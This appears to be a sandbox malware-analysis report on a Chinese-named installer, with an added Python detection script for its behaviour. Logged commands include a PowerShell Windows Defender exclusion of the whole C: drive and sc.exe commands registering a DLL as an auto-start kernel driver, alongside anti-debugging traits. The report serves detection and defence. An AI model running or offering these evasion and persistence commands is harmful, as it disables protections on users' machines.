Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-U4PSC.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-KS9P5.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\is-U9N4C.tmp
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-U4PSC.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-KS9P5.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\updat4.vac
Source: C:\Program Files (x86)\Windows NT\7zr.exe | API coverage: 7.4 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7492 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Code function: 6_2_6CCF98B0 FindFirstFileA,FindClose,FindClose,6_2_6CCF98B0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_005A6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,10_2_005A6868
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_005A7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,10_2_005A7496
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_005A9C60 GetSystemInfo,10_2_005A9C60
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000002.1798390794.0000000000FBF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000002.1798390794.0000000000FBF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Code function: 6_2_6CB83886 NtSetInformationThread 00000000,00000011,00000000,000000006_2_6CB83886
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Code function: 6_2_6CD0EFA1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6CD0EFA1
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_006257D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,10_2_006257D0
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Code function: 6_2_6CD0DF9D mov eax, dword ptr fs:[00000030h]6_2_6CD0DF9D
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Code function: 6_2_6CD18B86 mov eax, dword ptr fs:[00000030h]6_2_6CD18B86
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Code function: 6_2_6CD18B55 mov eax, dword ptr fs:[00000030h]6_2_6CD18B55
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Code function: 6_2_6CD07ADD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_6CD07ADD

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: tProtect.dll.12.dr | Static PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Code function: 6_2_6CDD5700 cpuid 6_2_6CDD5700
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_005AAB2A GetSystemTimeAsFileTime,10_2_005AAB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00640090 GetVersion,10_2_00640090
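The process-creation entry above (cmd.exe starting sc.exe with "sc start CleverSoar") and the "Adds a directory exclusion to Windows Defender" signature in the behavior graph are the two cheapest places to catch this installer chain on an endpoint. The following is an added example, not code from the report or from Joe Sandbox: it runs three checks over process-creation events. The events are constructed to mirror this report's tree; the encoded PowerShell command line in them is a hypothetical reconstruction (the report records that an encoded MpPreference cmdlet added an exclusion but does not print the command), and the KNOWN_SERVICES baseline is an assumption.

```python
import base64
import re

# Constructed process-creation events modelled on this report's process tree:
# cmd.exe -> sc.exe ("sc start CleverSoar") and the Inno Setup .tmp -> powershell.exe.
# The encoded PowerShell command line is a hypothetical reconstruction: the report
# states that an encoded MpPreference cmdlet added a Defender exclusion but does not
# print the command itself. The third event is a benign control.
def encode_ps(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\sc.exe",
     "cmdline": "sc start CleverSoar"},
    {"parent": r"C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -EncodedCommand "
                + encode_ps(r"Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows NT'")},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\sc.exe",
     "cmdline": "sc query wuauserv"},
]

# Assumed baseline of service names that sc.exe start/create/config may legitimately touch.
KNOWN_SERVICES = {"wuauserv", "bits", "spooler", "winmgmt"}

# -e, -ec, -enc and -EncodedCommand are all accepted by powershell.exe.
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
SC_CONTROL = re.compile(r"^sc(?:\.exe)?\s+(start|create|config)\s+(\S+)", re.IGNORECASE)
MP_PREFERENCE = re.compile(r"\b(Add|Set|Remove)-MpPreference\b", re.IGNORECASE)


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(event: dict) -> list:
    """Apply the checks to one event and return its findings (empty list if clean)."""
    findings = []
    image = event["image"].rsplit("\\", 1)[-1].lower()
    cmd = event["cmdline"]
    if image == "sc.exe":
        m = SC_CONTROL.match(cmd)
        if m and m.group(2).lower() not in KNOWN_SERVICES:
            findings.append(f"sc.exe {m.group(1).lower()} of non-baseline service '{m.group(2)}'")
    elif image == "powershell.exe":
        decoded = decode_encoded_command(cmd)
        if decoded and MP_PREFERENCE.search(decoded):
            findings.append(f"encoded Defender preference change: {decoded}")
        if "\\appdata\\local\\temp\\" in event["parent"].lower():
            findings.append("powershell.exe spawned by a parent running from %TEMP%")
    return findings


def scan(events: list) -> list:
    """Run analyse() over every event; returns (cmdline, finding) pairs."""
    return [(e["cmdline"], f) for e in events for f in analyse(e)]


if __name__ == "__main__":
    for cmdline, finding in scan(SAMPLE_EVENTS):
        print(f"[!] {finding}\n    {cmdline}")
```

Decoding the -EncodedCommand argument before matching is the point of the second check: a substring match on the raw command line never sees "Add-MpPreference", which is exactly why the sandbox flags the base64 form as its own signature.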
MITRE ATT&CK matrix, flattened from the report's 14-column layout. Only techniques that carry a badge are listed; the number in parentheses is the badge exactly as displayed next to the technique. Cells without a badge are the matrix's standard technique placeholders and are omitted.

Reconnaissance: none
Resource Development: none
Initial Access: none
Execution: Command and Scripting Interpreter (2), Service Execution (1), Native API (1)
Persistence: Windows Service (1), DLL Side-Loading (1)
Privilege Escalation: Access Token Manipulation (1), Windows Service (1), Process Injection (111), DLL Side-Loading (1)
Defense Evasion: Masquerading (11), Disable or Modify Tools (1), Virtualization/Sandbox Evasion (231), Access Token Manipulation (1), Process Injection (111), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), Software Packing (1), DLL Side-Loading (1)
Credential Access: none
Discovery: System Time Discovery (1), Security Software Discovery (321), Virtualization/Sandbox Evasion (231), Process Discovery (2), Application Window Discovery (1), System Owner/User Discovery (2), File and Directory Discovery (3), System Information Discovery (25)
Lateral Movement: none
Collection: Archive Collected Data (1)
Command and Control: Encrypted Channel (1)
Exfiltration: none
Impact: System Shutdown/Reboot (1)
Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior Graph ID: 1579756 | Sample: #U5b89#U88c5#U52a9#U624b_2.... | Start date: 23/12/2024 | Architecture: WINDOWS | Score: 88

Signatures on the sample itself:
  Multi AV Scanner detection for submitted file
  Found driver which could be used to inject code into processes
  PE file contains section with special chars
  2 other signatures

Process tree (dropped files and matched signatures are listed under the process that produced them; numbers in parentheses after a process name are the badge values shown in the graph):

#U5b89#U88c5#U52a9#U624b_2.0.7.exe (2)
  dropped: C:\...\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp, PE32
  #U5b89#U88c5#U52a9#U624b_2.0.7.tmp (3 5)
    dropped: C:\Users\user\AppData\Local\...\update.vac, PE32
    dropped: C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+
    signature: Adds a directory exclusion to Windows Defender
    #U5b89#U88c5#U52a9#U624b_2.0.7.exe (2)
      dropped: C:\...\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp, PE32
      #U5b89#U88c5#U52a9#U624b_2.0.7.tmp (4 16)
        dropped: C:\Users\user\AppData\Local\...\update.vac, PE32
        dropped: C:\Program Files (x86)\...\updat4.vac, PE32
        dropped: C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+
        dropped: 3 other files (none is malicious)
        signature: Query firmware table information (likely to detect VMs)
        signature: Protects its processes via BreakOnTermination flag
        signature: Hides threads from debuggers
        signature: Contains functionality to hide a thread from the debugger
        7zr.exe (2)
          dropped: C:\Program Files (x86)\...\tProtect.dll, PE32+
          conhost.exe
        7zr.exe (6)
          conhost.exe
    powershell.exe (23)
      signature: Loading BitLocker PowerShell Module
      conhost.exe
      WmiPrvSE.exe
cmd.exe
  sc.exe (1)
    conhost.exe
cmd.exe
  sc.exe (1)
    conhost.exe
31 other processes
  sc.exe (1), three instances, each with its own conhost.exe
  27 other processes
    conhost.exe
    26 other processes

Submitted file:
Source | Detection | Scanner
#U5b89#U88c5#U52a9#U624b_2.0.7.exe | 10% | Virustotal
#U5b89#U88c5#U52a9#U624b_2.0.7.exe | 8% | ReversingLabs

Dropped files:
Source | Detection | Scanner
C:\Program Files (x86)\Windows NT\7zr.exe | 0% | ReversingLabs
C:\Program Files (x86)\Windows NT\7zr.exe | 0% | Virustotal
C:\Program Files (x86)\Windows NT\is-U9N4C.tmp | 0% | ReversingLabs
C:\Program Files (x86)\Windows NT\is-U9N4C.tmp | 0% | Virustotal
C:\Program Files (x86)\Windows NT\tProtect.dll | 9% | ReversingLabs
C:\Program Files (x86)\Windows NT\tProtect.dll | 4% | Virustotal
C:\Program Files (x86)\Windows NT\trash (copy) | 0% | ReversingLabs
C:\Program Files (x86)\Windows NT\trash (copy) | 0% | Virustotal
C:\Program Files (x86)\Windows NT\updat4.vac | 13% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-KS9P5.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-KS9P5.tmp\update.vac | 13% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-U4PSC.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-U4PSC.tmp\update.vac | 13% | ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
URLs found in memory dumps and dropped files (no antivirus detection for any entry):
Name | Source | Malicious | Reputation
https://aria2.github.io/Usage: | #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000004339000.00000004.00001000.00020000.00000000.sdmp, is-U9N4C.tmp.6.dr | false | high
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU | #U5b89#U88c5#U52a9#U624b_2.0.7.exe | false | high
https://github.com/aria2/aria2/issuesReport | #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000004339000.00000004.00001000.00020000.00000000.sdmp, is-U9N4C.tmp.6.dr | false | high
http://www.metalinker.org/ | #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000004339000.00000004.00001000.00020000.00000000.sdmp, is-U9N4C.tmp.6.dr | false | high
https://www.remobjects.com/ps | #U5b89#U88c5#U52a9#U624b_2.0.7.exe, 00000000.00000003.1716704365.000000007EFEB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.exe, 00000000.00000003.1716196291.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000000.1718548852.0000000000791000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000000.1783529044.000000000064D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.0.dr, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.5.dr | false | high
https://aria2.github.io/ | #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000004339000.00000004.00001000.00020000.00000000.sdmp, is-U9N4C.tmp.6.dr | false | high
https://github.com/aria2/aria2/issues | #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000004339000.00000004.00001000.00020000.00000000.sdmp, is-U9N4C.tmp.6.dr | false | high
https://www.innosetup.com/ | #U5b89#U88c5#U52a9#U624b_2.0.7.exe, 00000000.00000003.1716704365.000000007EFEB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.exe, 00000000.00000003.1716196291.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000000.1718548852.0000000000791000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000000.1783529044.000000000064D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.0.dr, #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.5.dr | false | high
http://www.metalinker.org/basic_string::_M_construct | #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000001.00000003.1780028810.0000000004339000.00000004.00001000.00020000.00000000.sdmp, is-U9N4C.tmp.6.dr | false | high
No contacted IP infos

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579756
Start date and time: 2024-12-23 08:47:54 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 10s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 110
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Critical Process Termination
Sample name: #U5b89#U88c5#U52a9#U624b_2.0.7.exe (renamed because the original name is a hash value)
Original Sample Name: _2.0.7.exe
Detection: MAL
Classification: mal88.evad.winEXE@141/32@0/0
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 74%
  • Number of executed functions: 121
  • Number of non-executed functions: 109
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
  • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
  • Exclude process from analysis (whitelisted): Conhost.exe, SIHClient.exe
  • Excluded IPs from analysis (whitelisted): 20.12.23.50
  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
  • Not all processes were analyzed; the report is missing behavior information
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtCreateKey calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
No simulations
No context
Joe Sandbox View matches (all associated samples are classified malicious, threat name Unknown):
Match: C:\Program Files (x86)\Windows NT\7zr.exe
Associated sample names:
  #U5b89#U88c5#U52a9#U624b_2.0.5.exe
  #U5b89#U88c5#U52a9#U624b_2.0.4.exe
  #U5b89#U88c5#U52a9#U624b_2.0.5.exe
  #U5b89#U88c5#U52a9#U624b_2.0.4.exe
  Zt43pLXYiu.exe
  #U5b89#U88c5#U52a9#U624b_1.0.9.exe
  Zt43pLXYiu.exe
  #U5b89#U88c5#U52a9#U624b_1.0.1.exe
  #U5b89#U88c5#U52a9#U624b_1.0.8.exe
                                      Process:C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):831200
                                      Entropy (8bit):6.671005303304742
                                      Encrypted:false
                                      SSDEEP:24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
                                      MD5:84DC4B92D860E8AEA55D12B1E87EA108
                                      SHA1:56074A031A81A2394770D4DA98AC01D99EC77AAD
                                      SHA-256:BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
                                      SHA-512:CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      Joe Sandbox View:
                                      • Filename: #U5b89#U88c5#U52a9#U624b_2.0.5.exe, Detection: malicious, Browse
                                      • Filename: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, Detection: malicious, Browse
                                      • Filename: #U5b89#U88c5#U52a9#U624b_2.0.5.exe, Detection: malicious, Browse
                                      • Filename: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, Detection: malicious, Browse
                                      • Filename: Zt43pLXYiu.exe, Detection: malicious, Browse
                                      • Filename: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, Detection: malicious, Browse
                                      • Filename: Zt43pLXYiu.exe, Detection: malicious, Browse
                                      • Filename: #U5b89#U88c5#U52a9#U624b_1.0.1.exe, Detection: malicious, Browse
                                      • Filename: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, Detection: malicious, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9A..} ..} ..} ...<... ...?..~ ...<..t ...?..v ...?... ...(.| ..} ... ...(.t ..K.... ..k_..~ ..K...~ ..f."._ ...R..x ...&..| ..Rich} ..........PE..L....\.d.....................N......:.............@..........................@............@.....................................x........................&.......d......................................................H............................text.............................. ..`.rdata..RZ.......\..................@..@.data...ds... ......................@....sxdata.............................@....rsrc...............................@..@.reloc..2r.......t..................@..B................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):249984
                                      Entropy (8bit):7.999274308700479
                                      Encrypted:true
                                      SSDEEP:6144:YvUwQQJgh4lbr/CfQG1i2fhL55mDxwh6WJPc1EvqIY:Ych4BGfh1n5Wwh1JEO+
                                      MD5:EE4E379C02879163A818FB56A4AE3930
                                      SHA1:3124ECF5FE5EE3D368624A851F28F4FED189279C
                                      SHA-256:83D99487935BD7DFD0208D694CA3B9E848CA10A3C46FAF6F37D2DFA80FF79B70
                                      SHA-512:B198C0EC89917587B8A298469B960807B63EF15E0BDF20AD889AC0529B488D36BACC56B9064BC11365DD7AE1E47259DB6B72A1FB42821E08B57E15549369ADD4
                                      Malicious:false
                                      Preview:.@S....:....,...............o..).f}.....c...+Q....P.....I..q...C..psY...j...Q#>L.S.......n.....wN)=..'....Y.6..-+..H..M;..4....t.....Bs(.h...?4_.....d..e@4.....t8.._...P>.+5'R.k..,.2..M....`..1.N..h..,Z/.).B..4.1XR5p..U...nA)...E.....!....A.\..B..t,..Hn..8.a.g.!.....k#.....&...8Y.....Ar...H.?v...D.a..L3...8..>...d.MZCF.v..K....3.x.*A.r..._>...djA...M...eP.r.,f...'....D4..f}G..5....E.7u.p.u....f.....3y..f={.........l.q..,d[.........Q.]..jR'iQ.......Tk|.i.."...j^S.s.../.tm.......~f.w..6.M!....y..w.....&.......i.[...#.(vl..V.g?t...m..5TN.%........W..s....2....W...%.y&.6...Q._...Y+a..4.X.X..._\.4......_^.8Xm.p...J..1.....}.#...[.....\4P0_*..i..B..!\...R.O3Q.t.......E..?bv.{..W...Z.0.&q.j.....+`}...........H.b...)..M...D.Z.cr.c.J.m..Y.:..y....F.FQ<..3.s.@.w../....GF.PH.K+...._.......5.j1;6..j6|...W...e.\\}...t..-..y...OB....H....+..:g..B`.nb....2.o...T;...b.gv........2B..P1e..t..Q.k1;T..0^...R..).Z.@...+.c.uB.....\.6...C..I...8...n"
                                      Process:C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):249984
                                      Entropy (8bit):7.999274308700479
                                      Encrypted:true
                                      SSDEEP:6144:YvUwQQJgh4lbr/CfQG1i2fhL55mDxwh6WJPc1EvqIY:Ych4BGfh1n5Wwh1JEO+
                                      MD5:EE4E379C02879163A818FB56A4AE3930
                                      SHA1:3124ECF5FE5EE3D368624A851F28F4FED189279C
                                      SHA-256:83D99487935BD7DFD0208D694CA3B9E848CA10A3C46FAF6F37D2DFA80FF79B70
                                      SHA-512:B198C0EC89917587B8A298469B960807B63EF15E0BDF20AD889AC0529B488D36BACC56B9064BC11365DD7AE1E47259DB6B72A1FB42821E08B57E15549369ADD4
                                      Malicious:false
